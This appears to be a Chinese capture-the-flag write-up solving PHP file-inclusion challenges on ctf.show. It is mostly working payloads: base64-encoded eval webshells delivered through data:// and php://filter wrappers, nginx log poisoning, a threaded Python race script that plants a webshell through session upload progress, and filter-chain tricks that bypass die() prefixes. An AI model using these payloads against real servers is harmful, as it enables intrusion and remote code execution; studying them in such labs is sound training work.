Web78

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

使用data协议或者php://filter协议

file=php://filter/read=convert.base64-encode/resource=flag.php
?file=data:,<?php @eval($_POST['shell']); ?>
?file=data:text/plain,<?php @eval($_POST['shell']); ?>
?file=data:text/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4=
?file=data:text/php;base64,<?php @fputs(fopen(base64_decode('ZWFzdGp1bi5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4='));?>

Web79

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤php,可以使用data协议+base64编码

file=data:text/txt;base64,PD9waHAgZWNobyhgY2F0IGZsYWcucGhwYCk7Pz4=

Web80

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

日志包含或者远程文件包含

User-Agent:<?php @eval($_POST['shell']); ?>

file=/var/log/nginx/access.log

POST:shell=echo`cat *`;

Web81

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

Web80一样?但是过滤冒号,不能用远程文件包含

Web82-86

原理在这里这里

解法1:

通过上传PHP_SESSION_UPLOAD_PROGRESS然后访问/tmp/sess_eastjun进行文件包含,在文件清空之前进行包含,就能生成eastjun.php

<!DOCTYPE html>
<html>
<body>
<form action="http://5534e84b-01ac-43de-8e46-6e8be029fce6.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
1
2

然后设置nullpayload+无限发包+100线程,生成eastjun.php,密码为shell

解法2:

import requests
import threading

sessid = 'eastjun'
session = requests.session()
url = 'http://ed47a5fb-33ed-46de-8a78-63f887c6d835.challenge.ctf.show:8080/'


def write():
    while True:
        session.post(
            url = f"{url}?file=/tmp/sess_eastjun",
            params={"file": f"/tmp/sess_{sessid}"},
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': "<?php @fputs(fopen('eastjun.php',w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4='));?>"},
            files={"file": ('xxx.txt', open("shell.txt", "r"))}, cookies={'PHPSESSID': sessid})


for i in range(100):
    thread = threading.Thread(target=write)
    thread.start()
#写个空白的shell.txt然后运行脚本,一键写马

Web 87

$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

对文件名进行url解码后再用file_put_contents写入,通过把p换成%2570(%2570→%70→p)绕过对php的过滤,通过base64解码将phpdie分解掉,前面添加两个a是因为phpdie只有6个字符

?file=%2570hp%253A%2F%2Ffilter%2Fwrite%3Dconvert%252Ebase64-decode%2Fresource%3Deastjun%252E%2570hp

POST:content=aaPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4=

Web88

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤加号等号php,但是分号冒号逗号反斜线和data没有过滤,直接用data协议+base64,如果payload中有等号或者加号可以在里面加几个空格

payload:file=data:text/plain;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4g

Web116

用python请求一下就可以拿到源码:

<?php
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=isset($_GET['file'])?$_GET['file']:"5.mp4";
filter($file);
header('Content-Type: video/mp4');
header("Content-Length: $file");
readfile($file);
?>

用的readfile函数,并没有用include将文件包含进来,直接输入文件名进行读取就行了

import requests

response = requests.get("http://07b2db24-0246-4139-ba97-da3f8e38bfb0.challenge.ctf.show:8080/?file=flag.php")
print(response.text)

Web117

highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

看一下这里的过滤器用法,还有各种Unicode编码,利用转换转换过滤器将die分解掉,将UCS-2LE(小端序)编码转为UCS-2BE(大端序)编码,结果是每两个字符直接交换位置

payloady:file=php://filter/convert.iconv.UCS-2LE.UCS2BE/resource=eastjun.php

POST:contents=?<hp pe@av(l_$OPTS'[hsle'l)]?; >

说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...